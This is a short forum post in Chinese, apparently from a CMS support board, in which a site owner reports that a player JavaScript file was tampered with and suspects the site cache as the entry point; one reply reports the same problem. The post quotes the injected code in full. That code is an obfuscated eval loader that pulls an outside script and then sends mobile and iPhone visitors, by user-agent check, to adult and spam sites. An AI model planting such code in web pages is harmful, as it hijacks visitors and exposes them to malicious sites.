是否有通过写入缓存的挂马方式漏洞

xixifengge2 2月前 357

这次网站被跳转是很意外的情况下发现,半夜手机端打开网站发现被跳转了,然后查看文件发现被挂js

https://www.artistvip.vip/js/player/play.js

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('4.5(\'<6 1="3/2" 7="//0.b.c.d/8.0"><\\/9\'+\'a>\');',14,14,'js|type|javascript|text|document|write|script|src|20064873|scr|ipt|users|51|la'.split('|'),0,{}))
var is_mobi=navigator.userAgent.toLowerCase().match(/(android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null;if(is_mobi){setTimeout('window.location.href="http://bba.zzyang.top/sihu40"',1000)
var is_mobis=navigator.userAgent.toLowerCase().match(/(ipod|iphone|ipad)/i)!=null;if(is_mobis){setTimeout('window.location.href="https://m.gotoydx.com:168/ua80357/"',1000)}

跳转的是个黄色网站了,

https://m.gotoydx.com:168/ua80357/

然后查看文件,data/cache 这个目录下的文件是有被加代码的,后台更新缓存,就没有了。

而我后台是打开了缓存开关的,猜想是不是有通过缓存文件挂马的方式。。。

最新回复 (1)
  • 0 引用 2
    应该是,我的也出现这种情况了,过了换成设置的时间自动就没有了
返回
发新帖